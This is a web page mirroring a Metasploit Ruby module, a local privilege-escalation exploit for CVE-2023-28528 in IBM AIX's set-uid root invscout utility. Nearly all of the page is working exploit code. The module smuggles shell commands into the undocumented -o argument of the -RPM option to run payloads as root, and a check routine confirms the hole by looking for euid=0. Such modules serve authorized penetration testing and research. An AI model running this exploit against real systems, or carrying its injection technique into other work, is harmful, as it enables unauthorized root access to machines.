CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/aix/local/invscout_rpm_priv_esc.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  prepend Msf::Exploit::Remote::AutoCheck

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'invscout RPM Privilege Escalation',

17
        'Description' => %q{

18
          This module exploits a command injection vulnerability in IBM AIX

19
          invscout set-uid root utility present in AIX 7.2 and earlier.

20


21
          The undocumented -rpm argument can be used to install an RPM file;

22
          and the undocumented -o argument passes arguments to the rpm utility

23
          without validation, leading to command injection with effective-uid

24
          root privileges.

25


26
          This module has been tested successfully on AIX 7.2.

27
        },

28
        'Author' => [

29
          'Tim Brown', # Discovery and PoC

30
          'bcoles' # Metasploit

31
        ],

32
        'References' => [

33
          ['CVE', '2023-28528'],

34
          ['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'],

35
        ],

36
        'Platform' => %w[unix aix],

37
        'Arch' => ARCH_CMD,

38
        'Payload' => {

39
          'BadChars' => "\x00\x0a\x0d\x22",

40
          'Compat' => {

41
            'PayloadType' => 'cmd',

42
            'RequiredCmd' => 'generic telnet openssl'

43
          }

44
        },

45
        'DefaultOptions' => {

46
          'PrependSetresuid' => true,

47
          'PrependSetresgid' => true,

48
          'PrependFork' => true

49
        },

50
        'SessionTypes' => %w[shell meterpreter],

51
        'Targets' => [['Automatic', {}]],

52
        'DefaultTarget' => 0,

53
        'DisclosureDate' => '2023-04-24',

54
        'Notes' => {

55
          'Stability' => [CRASH_SAFE],

56
          'Reliability' => [REPEATABLE_SESSION],

57
          'SideEffects' => [IOC_IN_LOGS]

58
        }

59
      )

60
    )

61


62
    register_options([

63
      OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', '/usr/sbin/invscout'])

64
    ])

65
  end

66


67
  def invscout_path

68
    datastore['INVSCOUT_PATH']

69
  end

70


71
  def check

72
    return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path)

73


74
    res = execute_command('id')

75
    id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s

76


77
    return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0')

78


79
    CheckCode::Vulnerable("Output: #{id}")

80
  end

81


82
  def execute_command(cmd, _opts = {})

83
    rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm"

84
    rpm_args = "; #{cmd}; echo "

85
    res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"")

86
    vprint_line(res) unless res.blank?

87
    res

88
  end

89


90
  def exploit

91
    execute_command(payload.encoded)

92
  end

93
end

94


95